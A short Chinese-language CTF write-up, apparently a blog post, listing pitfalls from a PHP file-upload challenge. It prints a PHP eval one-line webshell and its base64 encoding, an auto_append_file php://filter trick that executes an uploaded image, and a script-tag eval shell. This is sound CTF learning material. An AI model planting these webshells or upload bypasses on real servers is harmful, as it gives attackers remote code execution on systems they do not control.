CTF2-funny_upload

踩坑点:

  1. 上传shell.png的时候,是<二进制图片数据>+base64编码后的木马
    这样当php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"发力的时候,base64decode的是二进制图片数据加上base64编码后的木马数据,解码之后的内容很有可能不再是php一句话木马了!

  2. 在BURP中对一句话木马进行base64编码的时候,忘记加一层URLencode了
    <?php @eval($_POST[4])?> ->base64编码 -> PD9waHAgQGV2YWwoJF9QT1NUWzRdKT8+
    注意,编码后末尾有一个+,这是HTTP不安全的,会被误认为是空格的URL编码的结果
    这样服务器收到的结果会把+变为空格。所以应该对编码后的内容再加一层URL编码

知识点:
<script language="php">eval($_POST['shell']);</script>
和php短标签在php7.0.0版本被废除了

推荐文章:
https://www.cnblogs.com/m1saka1/p/18416241

posted on 2026-08-06 22:49  misaki%20mei  阅读(10)  评论(0)    收藏  举报

导航